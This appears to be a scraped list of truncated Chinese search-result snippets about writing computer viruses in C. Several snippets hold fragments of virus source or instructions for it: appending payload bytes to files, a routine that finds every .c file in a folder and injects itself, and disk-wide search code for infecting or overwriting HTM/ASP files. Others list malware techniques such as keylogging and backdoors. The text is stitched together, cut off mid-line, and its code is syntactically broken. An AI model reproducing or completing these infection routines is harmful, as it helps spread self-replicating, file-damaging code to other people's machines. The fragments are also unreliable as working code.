CloseHandle(h_file); // 修改原始文件的内容,将病毒代码插入到文件末尾 char virus_code[] = "x4Dx5A"; // MZ PE header signature memcpy(buffer + file_size sizeof(virus_code), virus_code, sizeof(virus_code)); // 将修改后的内容写回原始文件 h_file = CreateFile(file_name, GENERIC_WRITE,...
1,主程序调用病毒功能函数 2,病毒功能函数读取查找同目录下所有c文件; 3,找到一个(被感染c文件),打开它,并且将此文件全部读取到数组变量; 4,重新创建一个同名文件(被感染c文件) 5,数组变量写回这个被感染c文件,同时将病毒源文件所需要的头文件,病毒功能函数 调用语句写入; 6,打开病毒源文件,将病毒功能函数全...
完全可以写一个TSR驻留函数 其实,这个程序勉强可以叫做病毒 根本不算是真正的病毒,好了就说这么多, 代码如下: #include <stdio.h> #include void main(void) { virus(); } int virus() { struct ffblk ffblk; FILE *in,*out,*read; char *virus="virus.c"; char buf[50][80]; char *p; char ...
C语言/C++恶意代码盘点丨木马病毒 恶意代码的分类包括计算机病毒、蠕虫、木马、后门、Rootkit、流氓软件、间谍软件、广告软件、僵尸(bot) 、Exploit等等,有些技术经常用到,有的也是必然用到。 恶意代码常见功能技术如下:进程遍历,文件遍历,按键记录,后门,桌面截屏,文件监控,...
C语⾔病毒代码 #include <io.h> #include #include <stdio.h> #include <stdlib.h> #include <string.h> /* copy outfile to infile */ void copyfile(char *infile, char *outfile){ FILE *in,*out;in = fopen(infile,"r");out = fopen(outfile,"w");while (!feof(in)){ fputc(fgetc(i...
内容提示: C 语言病毒代码 #include <io.h> #include #include <stdio.h> #include <stdlib.h> #include <string.h> /* copy outfile to infile */ void copyfile(char *infile, char *outfile) { FILE *in,*out; in = fopen(infile,"r"); out = fopen(outfile,"w"); while (!feof(in)...
一个c病毒源代码 #include <windows.h> #include <Shlwapi.h> #include <fstream.h> #include <TlHelp32.h> #include <Dbt.h> #pragma comment(lib,'shlwapi.lib') #define TIMER 1//计时器 //function LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);//窗口过程 ...
全盘文件破坏全盘文件搜索代码是很有用的,常用于全盘或特定类型文件感染。如很久前的病毒 替代者就是覆盖所有 HTM/ASP 文件。还有许多脚本病毒会修改电脑里面的文件,并将病毒脚本插入到正常的文件中去,如 VBS.KJ。文件查找的代码: 34 / 48 光影 struct DirList{ char table[MAX_PATH]; DirList *pNext; }; ...
恶意代码的分类包括计算机病毒、蠕虫、木马、后门、Rootkit、流氓软件、间谍软件、广告软件、僵尸(bot) 、Exploit等等,有些技术经常用到,有的也是必然用到。 恶意代码常见功能技术如下:进程遍历,文件遍历,按…
在病毒结构中,首要的并且唯一必需的部分是感染机制。病毒首先必须是可以生殖自身的代码,这是病毒之所以成为病毒的根本 原因。我们可以用一段类C伪码来表示这个过程。 InfectSection() { if (infectable_object_found &&object_not_already_infect) infect_object; } ...